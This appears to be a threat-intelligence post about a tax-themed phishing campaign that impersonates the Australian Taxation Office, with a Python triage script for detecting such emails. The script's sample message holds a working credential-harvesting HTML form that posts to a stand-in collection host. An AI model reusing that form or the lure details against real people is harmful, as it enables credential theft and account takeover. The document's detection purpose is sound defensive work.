Author: Nick Sundvall
TLP: WHITE
On 1 February, we observed a malspam campaign distributing a Hypertext Markup Language (HTML) file designed to steal email credentials from the recipient. The campaign’s email subject references tax documents. In the United States, it is not unusual to see campaigns using tax-related lures at this time of the year.
This is not a very sophisticated campaign; the threat actor only appears to be seeking to steal the victim’s email address and password. If the victim does not have multi-factor authentication enabled for their email account, the threat actor can use the stolen credentials to log in, allowing them to gain access to the victim’s emails and potentially take over the account.
The threat actor used tax-themed email subjects to lure the recipient into opening the attached HTML file and entering their credentials. However, the threat actor appears to have made a mistake with the names of the attached files, the subjects, and the spoofed sender address: they mostly refer to the Australian Taxation Office (ATO) and Australian tax documents, even though the campaign was sent in early February, when the U.S. filing season is the natural lure. The Australian tax season begins in July, after the financial year ends on 30 June, and individuals lodging their own return have until 31 October.[1]
The names of the attached files included ATO Tax Invoice.html and eDocument Refund.html. Subjects of the emails included ATO 2020 Tax Payment plan and ATO TAX REFUND, while the email bodies were left blank. The sender address was spoofed to use the agency's real domain, @ato.gov.au.
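As an added example (not Infoblox's code, and not drawn from the report), the following Python triage script turns the details above into checks a mail-security analyst could run over a raw message: it matches the lure subjects and attachment names listed, treats a From address at ato.gov.au that lacks a DMARC pass in the Authentication-Results header as spoofed, flags an empty body paired with an HTML attachment, and parses the attachment for a form that collects a password and submits it to an external host. The sample message and its HTML attachment are constructed for the example; the collection URL, the file's exact structure, the form-based exfiltration, and the assumption that the receiving mail server stamps Authentication-Results are mine, not facts from the campaign.

```python
"""Triage a raw email for the HTML-attachment credential-phishing pattern
described above. Hypothetical example, not Infoblox tooling."""
from email import message_from_string, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the campaign description (compared case-insensitively).
LURE_SUBJECTS = {"ato 2020 tax payment plan", "ato tax refund"}
LURE_ATTACHMENTS = {"ato tax invoice.html", "edocument refund.html"}
SPOOFED_SENDER_DOMAIN = "ato.gov.au"


class CredentialFormScanner(HTMLParser):
    """Record every <form>, whether it collects a password, and its submit
    target. Only form-based harvesting is seen here; an attachment that
    exfiltrates via JavaScript needs dynamic analysis instead."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if a.get("type", "text").lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def credential_forms(html_text):
    """Return the forms that ask for a password, with their submit target."""
    scanner = CredentialFormScanner()
    scanner.feed(html_text)
    return [f for f in scanner.forms if f["password"]]


def posts_off_page(action):
    """A locally opened HTML file has no web origin, so a harvesting form
    needs an absolute http(s) URL to deliver the credentials anywhere."""
    u = urlparse(action)
    return u.scheme in ("http", "https") and bool(u.netloc)


def triage_message(raw):
    """Return a list of findings for one RFC 5322 message given as a string."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []

    subject = (msg.get("Subject") or "").strip()
    if subject.lower() in LURE_SUBJECTS:
        findings.append(f"subject is a known lure: {subject!r}")

    # Assumption: the receiving MTA stamps Authentication-Results (RFC 8601).
    # Mail claiming the real agency domain without a DMARC pass is spoofed
    # or, at best, unverifiable.
    sender_domain = parseaddr(msg.get("From") or "")[1].rpartition("@")[2].lower()
    auth = (msg.get("Authentication-Results") or "").lower()
    if sender_domain == SPOOFED_SENDER_DOMAIN and "dmarc=pass" not in auth:
        findings.append(f"From claims {sender_domain} without a DMARC pass")

    body = msg.get_body(preferencelist=("plain", "html"))
    body_text = body.get_content().strip() if body is not None else ""

    html_attachments = 0
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith((".html", ".htm")):
            continue
        html_attachments += 1
        if name.lower() in LURE_ATTACHMENTS:
            findings.append(f"attachment name is a known lure: {name!r}")
        for form in credential_forms(part.get_content()):
            if posts_off_page(form["action"]):
                findings.append(f"{name!r} has a password form posting to {form['action']}")
    if html_attachments and not body_text:
        findings.append("empty body with an HTML attachment")
    return findings


def verdict(findings):
    """Two independent indicators are enough to pull the message for review."""
    return "suspicious" if len(findings) >= 2 else "benign"


# Constructed sample message: the headers, the empty text part, the HTML
# attachment and the collection URL are all invented for this example.
SAMPLE_PHISH = """\
From: "Australian Taxation Office" <noreply@ato.gov.au>
To: victim@example.com
Subject: ATO TAX REFUND
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=ato.gov.au; dmarc=fail header.from=ato.gov.au
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

--b1
Content-Type: text/html; charset="utf-8"; name="eDocument Refund.html"
Content-Disposition: attachment; filename="eDocument Refund.html"

<html><body>
<p>Sign in with your email account to view the refund document.</p>
<form method="post" action="https://collect.example.net/auth.php">
<input type="email" name="email">
<input type="password" name="password">
<input type="submit" value="View Document">
</form>
</body></html>
--b1--
"""

if __name__ == "__main__":
    found = triage_message(SAMPLE_PHISH)
    print(verdict(found))
    for line in found:
        print(" -", line)
```

Matching on the exact subjects and filenames only catches this campaign; the durable signals are the last three checks (unauthenticated use of a government domain, a blank body carrying an HTML attachment, and a password form that posts to a third-party host), which survive the next lure rename. The form scanner is deliberately static and will miss an attachment that builds the login page or sends the credentials from script, so a hit on the other indicators should still send the file to a sandbox.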
Infoblox’s full report on this campaign will be available soon on our Threat Intelligence Reports page.